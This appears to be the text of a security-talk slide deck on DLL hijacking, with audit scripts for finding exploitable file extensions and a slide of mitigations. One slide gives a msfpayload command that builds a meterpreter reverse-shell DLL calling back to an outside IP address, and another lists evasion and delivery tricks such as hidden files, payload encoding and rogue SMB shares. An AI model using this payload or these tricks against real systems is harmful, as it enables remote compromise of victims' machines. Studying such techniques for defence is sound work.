DLL hijacking is a technique that tricks a program into loading a malicious DLL instead of the expected one. It works by placing the malicious DLL in a location the program searches before its expected DLL path. An audit tool was demonstrated that automates detecting exploitable extensions by generating test files and monitoring the program and DLL loading behavior. The document proposes ways to deliver a malicious payload via a hijacked DLL and discusses mitigations like disabling WebDAV/SMB shares and having programs securely load DLLs.

1. How To Become a Hijacking TerroristDLL Hijacking for fun and profit

2. DLL Hijacking OverviewDLL Hijacking: Trick a program to use a malicious DLL instead of the normal DLLHDM found that when opening a file associated to a program, the file will look in the local path for the referenced DLLs of the program before looking inside the correct location of the associated executable

3. PCAP Example - Normal

4. PCAP Example - Hijacked

5. DLL HijackingOld trick – new dogLinux removed “.” from $PATHClient side, WebDAV, or remote SMB shareWidely exploitableEasy to detect

6. DLLHijackAuditKitAutomates the detectionGenerates test scenarios for each file extension and automatically creates an exploitable fileSearches every extension

7. Demo

8. Audit.jsDownload procmon from sysinternalsOpens procmon and filters for operations that begins with "IRP_MJ_" or "FASTIO_". Use WMI to query the local system and file all the possible file extensions it can handleGenerate test cases for each file scenario. Make a dummy file with the word “Howdy…” in it named after the extension being testedAutomatically open each file from command line While opening, log file system activity in procmonWait a few seconds and then close out the program and try the next file When you get all done, you need to save the procmon file as LogFile.csv. This logfile will have the executable related to the file that was opened and also the path that it tried to look for a DLL.

9. Analyze.jsParses the LogFile.csv for the executable and the DLL that it was looking for (wireshark.exe and airpcap.dll) Generate test scenarios and copy in a dummy DLL named after the real DLL it’s looking for. run the file again if it is successful, the DLL will create a txt file named exploit.txt Repeat this step for each EXE and DLL pair to verify which are actively exploitable

10. Real World Attack ScenarioGenerate Payload: msfpayload windows/meterpreter/reverse_tcp LHOST=66.66.66.66 LPORT=4242 D > exploit.dllRename to the DLL that the EXE is looking forPut the DLL in the same folder as a file with an associated extensionDeliver file and DLL

11. TricksUse the Hidden attributeObfuscate with lots of other filesMSFEncode the payloadCreate a link to a subfolderRoad ApplesHost a SMB share on the net!Create a WebDAV share

12. MitigationAdmins:Microsoft tool to catch illegal DLL referenceshttp://support.microsoft.com/kb/2264107CWDIllegalInDllSearch registryDisable WebDAVDisable outbound SMB (139 445)Developers:Load DLL’s securely

13. Referenceshttp://www.microsoft.com/technet/security/advisory/2269637.mspxhttp://blog.metasploit.com/2010/08/better-faster-stronger.html

14. 0day (AFAIK)RDP .dll